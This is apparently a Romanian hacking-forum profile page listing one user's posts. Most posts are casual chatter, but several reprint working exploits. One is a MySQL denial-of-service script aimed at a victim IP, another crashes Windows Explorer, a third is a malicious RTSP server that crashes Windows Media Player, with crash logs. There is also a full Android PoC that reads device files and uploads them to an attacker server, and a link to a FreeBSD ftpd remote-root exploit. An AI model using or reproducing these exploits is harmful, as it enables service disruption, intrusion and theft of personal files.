Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. 4.7 MERCALI;) ps: nu fiti superstitiosi ca aduce ghinion:))
  2. #Becuri: depinde de suprafata pe care cad #Cea cu ancora: mai complicata decat pare.Daca ai o bila de metal (ancora) si o scufunzi intr-o cana (bazin) nivelul lichidului din cana va creste cu x milimetri.Daca insa pui bila pe o minge de ping-pong taiata nivelul apei va creste mai mult. Raspunsul la intrebvare este: nivelul apei scade #Buruieni: ai n buruieni. n-2 =trandafiri (1) (n-2)-2 =margarete (2) [(n-2)-2]-2=lalele. (3) (1)(2)(3) => ai cel putin 6 flori (pt pesimisti) sau cel putin 7 (pt optimisti) #Nemtii is cei mai inalti:Consult statisticile? @cris2decoder da
  3. programul lui se ocupa de Half Open Connections probabil.N-am stat sa ma uit. @justfor nu mai posta programe de genu
  4. Daca am mai vazut asa ceva sigur a fost cu multe milioane de ani in urma,reconstituit pe calculator si difuzat pe discovery,la o ora tarzie. "Tulai doamni si traznesti" LE: toata lumea face petitii pentru orice.Nu se poate face una sa se desfiinteze dracu jocu ala?Dispus sa donez pentru asta
  5. Cat i-ai dat pe forum? Cunostinte?
  6. import socket, sys print "\n" print "----------------------------------------------------------------" print "| MySQL 5.5.8 Null Ptr (windows) |" print "| Level Smash the Stack |" print "----------------------------------------------------------------" print "\n" buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00") buf2=("\x11\x00\x00\x00\x03set autocommit30") def usage(): print "usage : ./mysql.py <victim_ip>" print "example: ./mysql.py 192.168.1.22" def main(): if len(sys.argv) != 2: usage() sys.exit() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = sys.argv[1] PORT = int(3306) s.connect((HOST,PORT)) print "[*] Connect" s.send(buf) print "[*] Payload 1 sent" s.send(buf2) print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" s.close() if __name__ == "__main__": main() sursa
  7. # Windows 2008 SP2 RC2 Explorer Go Byebye # Windows 7 Pro SP1 Explorer Go Byebye # Interesting # Brought to you by Level & z0r0 @ Smash The Stack from win32com.shell import shell, shellcon from os import mkdir try: mkdir("c:\\trigger_alt") except: print "[!] Trigger Directory Exists" try: mkdir("c:\\trigger_alt\\....") except: print "[!] Trigger Sub Directory Exists" print "[!] Triggering Issue" # This moves the directory containing the sub directory which creates the condition. # The issue is in the function that moves the files to the recycle bin # Replicate this using the following # 1- mkdir c:\trigger_alt # 2- cd c:\trigger_alt # 3- mkdir ....\ # 4- My Computer -> c:\trigger_alt # 5- Right Click -> Delete shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION)) Copyright 2011 - BugSearch sursa
  8. import socket, binascii print "\n" print "----------------------------------------------------------------" print "| WMP11 Remote Null Pointer |" print "| Level, Smash the Stack |" print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |" print "----------------------------------------------------------------" print "\n" print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n" HOST = "127.0.0.1" PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) buf = [ ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746" "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643" "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683" "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474" "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310" "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206" "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7" "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636" "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726" "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205" "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363" "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7" "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7" "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0" "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393" "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494" "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746" "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7" "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707" "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414" "1414141414c784141414141414141414141414141414141414141664141414141414141414843677" "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414" "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414" "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707" "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415" "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414" "1414141414141414151414141414141514145414150414141414141414141416b516663743765707" "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415" "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414" "1414149414141414167414141414141595145424145416641414151414141414151415141416f414" "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676" "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316" "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414" "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414" "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7" "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0" "a0d0a") ] while True: conn, addr = s.accept() print "-----Request From Client-----\n" print conn.recv(1024) print "-----Request From Client-----\n" print "-----Response From Server-----\n" print binascii.unhexlify(buf[0]) print "-----Response From Server-----\n" conn.send(binascii.unhexlify(buf[0])) conn.close() s.close() #CRASH #(ae8.5b8): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #0:021> g #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!) #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #PAYLOAD# #RTSP/1.0 208 OK #Content-Type: application/sdp #Vary: Accept #X-Playlist-Gen-Id: 176 #X-Broadcast-Id: 0 #Content-Length: 879 #Date: Sun, 08 May 2011 15:24:33 GMT #CSeq: 1 #Server: WMServer/9.1.1.3841 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT #Etag: "168" #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable sursa
  9. Welcome to Moldavia
  10. Mai umpic si gasesc procesoare oricum...tot ciudat ramane
  11. HTC Wildfire merge decodat asa?
  12. Vezi in bios sa fie setarile corecte pentru boot.Incearca un restore default.Daca nu, repair cu cdu
  13. merge brici.Sa-l lasi asa,nu-l face cu 3.5 pt tot prostu
  14. LLegoLLaS

    blitz

    Free Torch Nokia 6303 Classic Java Apps - Mobiles24.com
  15. Cade-n cur si se ridica Bine ai venit shogore =)
  16. E bun asa.Cunostinte?
  17. Bine ai venit ;)tine-te de treaba
  18. cel putin o ora te tin cred ps: there is only one way to find out
  19. La mine nu se downloadeaza chat.php indiferent de browser. @Nytro Te-as ruga sa-mi setezi Join date(mar2008),rep power (5) si sutom title (668.5)
  20. depinde de care is: NiCD,NiMH, depinde si de capacitate (cati mAh) si bineinteles la ce ii folosesti,depinde de aseamenea de gradul de uzura,de calitate (una e serioux si alta e duracell sau energizer)
  21. sa-mi moara ce-am pe casa daca am inteles ce ai vrut sa zici
  22. E ok, au mai ramas join date (Mar 2008) si Rep Power(5). ps; si pe tema RST Beta,la Infractions e fontu negru la coloanele Expires,Points,date .
  23. /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * ***************************************************************************** * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: http://www.exploit-db.com/sploits/7350roaringbeastv3.tar sursa
  24. <?php /* * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities * Bugtraq ID: 48256 * CVE: CVE-2010-4804 * Affected: Android < 2.3.4 * Author: Thomas Cannon * Discovered: 18-Nov-2010 * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ * * Filename: poc.php * Instructions: Specify files you want to upload in filenames array. Host this php file * on a server and visit it using the Android Browser. Some builds of Android * may require adjustments to the script, for example when a German build was * tested it downloaded the payload as .htm instead of .html, even though .html * was specified. * * Tested on: HTC Desire (UK Version) with Android 2.2 */ // List of the files on the device that we want to upload to our server $filenames = array("/proc/version","/sdcard/img.jpg"); // Determine the full URL of this script $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; // Stage 0: Display introduction text and a link to start the PoC. function stage0($scripturl) { echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the // context of the local device - this is the vulnerability. function stage1($scripturl) { echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">"; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> <html> <body> <script language='javascript'> var filenames = Array('<?php echo implode("','",$filenames); ?>'); var filecontents = new Array(); function processBinary(xmlhttp) { data = xmlhttp.responseText; r = ''; size = data.length; for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff); return r; } function getFiles(filenames) { for (var filename in filenames) { filename = filenames[filename]; xhr = new XMLHttpRequest(); xhr.open('GET', filename, false); xhr.overrideMimeType('text/plain; charset=x-user-defined'); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } } xhr.send(); } } function addField(form, name, value) { var fe = document.createElement('input'); fe.setAttribute('type', 'hidden'); fe.setAttribute('name', name); fe.setAttribute('value', value); form.appendChild(fe); } function uploadFiles(filecontents) { var form = document.createElement('form'); form.setAttribute('method', 'POST'); form.setAttribute('enctype', 'multipart/form-data'); form.setAttribute('action', '<?=$scripturl?>?stage=3'); var i = 0; for (var filename in filecontents) { addField(form, 'filename'+i, btoa(filename)); addField(form, 'data'+i, filecontents[filename]); i += 1; } document.body.appendChild(form); form.submit(); } getFiles(filenames); uploadFiles(filecontents); </script> </body> </html> <?php } // Stage 3: Read the file names and contents sent by the payload and write to a file on the server. function stage3() { $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!"); fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); fclose($fp); echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!"; } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; default: stage0($scripturl); break; } ?> sursa
×
×
  • Create New...